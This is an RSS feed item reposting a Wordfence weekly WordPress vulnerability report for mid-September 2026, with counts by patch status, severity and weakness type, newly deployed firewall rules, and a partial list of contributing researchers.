<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Swift Website Updates &amp; Maintenance</title>
	<atom:link href="https://swiftupdates.ca/feed/" rel="self" type="application/rss+xml" />
	<link>https://swiftupdates.ca</link>
	<description>Swift Website Updates &#124; Wordpress Support</description>
	<lastBuildDate>Thu, 24 Sep 2026 18:58:31 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.6</generator>

<image>
	<url>https://swiftupdates.ca/wp-content/uploads/2022/11/Screen-Shot-2022-11-10-at-1.41.01-PM.png</url>
	<title>Swift Website Updates &amp; Maintenance</title>
	<link>https://swiftupdates.ca</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (September 14, 2026 to September 20, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-14-2026-to-september-20-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 24 Sep 2026 18:58:31 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-september-14-2026-to-september-20-2026/</guid>

					<description><![CDATA[Last week, there were 358 vulnerabilities disclosed in 243 WordPress Plugins and 4 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 184 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 358 vulnerabilities disclosed in 243 WordPress Plugins and 4 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 184 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, and <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 40,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li>WAF-RULE-957 – Data redacted while we work with the vendor on a patch.</li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-71-unauthenticated-stored-cross-site-scripting-via-wpautop-blockquote-handling?asset_slug=wordpress" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 – Unauthenticated Stored Cross-Site Scripting via wpautop() Blockquote Handling</a></li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">311</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">47</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Low Severity</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">262</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">74</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">18</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">94</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">68</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">35</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">27</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">26</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">19</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Client-Side Enforcement of Server-Side Security</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Improper Authentication</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Protection Mechanism Failure</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>URL Redirection to Untrusted Site (&#8216;Open Redirect&#8217;)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Authentication Bypass Using an Alternate Path or Channel</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Improper Input Validation</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Insufficient Verification of Data Authenticity</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Uncontrolled Resource Consumption</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Authentication Bypass by Spoofing</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Embedded Malicious Code</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>External Control of File Name or Path</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Guessable CAPTCHA</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Encoding or Escaping of Output</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements in Output Used by a Downstream Component (&#8216;Injection&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Restriction of Rendered UI Layers or Frames</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Verification of Cryptographic Signature</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Insufficiently Protected Credentials</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">25</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a>
				</div>
</p></div>
</td>
<td class="total text-center">17</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a>
				</div>
</p></div>
</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a>
				</div>
</p></div>
</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a>
				</div>
</p></div>
</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a>
				</div>
</p></div>
</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a>
				</div>
</p></div>
</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5ddf9d14fe3d5ebed8efd101f21a9e12.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ddf9d14fe3d5ebed8efd101f21a9e12"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benedictus-jovan" target="_blank" rel="noopener">Benedictus Jovan (aillesiM)</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4b091b6dca7c1378c156dc35baaa50f5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b091b6dca7c1378c156dc35baaa50f5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener">Theo Antônio Da Fonseca</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4d8876b62aaa83428aafd305d0f556cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4d8876b62aaa83428aafd305d0f556cc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener">Choriyev Qahramon</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cf5907d5170a7200adc6f07076350d97.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf5907d5170a7200adc6f07076350d97"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener">vuxvinh</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5654f29de740409684396c829b955ab6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5654f29de740409684396c829b955ab6"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxnx" target="_blank" rel="noopener">VuxNx</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd825c1225bd78591f13551a4eebb63a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd825c1225bd78591f13551a4eebb63a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chairat-toraya" target="_blank" rel="noopener">Kyokito</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/79ed370a05dae7cb22b4e00d79829131.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79ed370a05dae7cb22b4e00d79829131"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener">Morato Antoine</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/29bd5dd110d9d483d533b011e29522de.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29bd5dd110d9d483d533b011e29522de"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener">Dthangws</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fd2bb32309c445d4b78303e1a770ded0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd2bb32309c445d4b78303e1a770ded0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener">Huynh Kien Minh</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
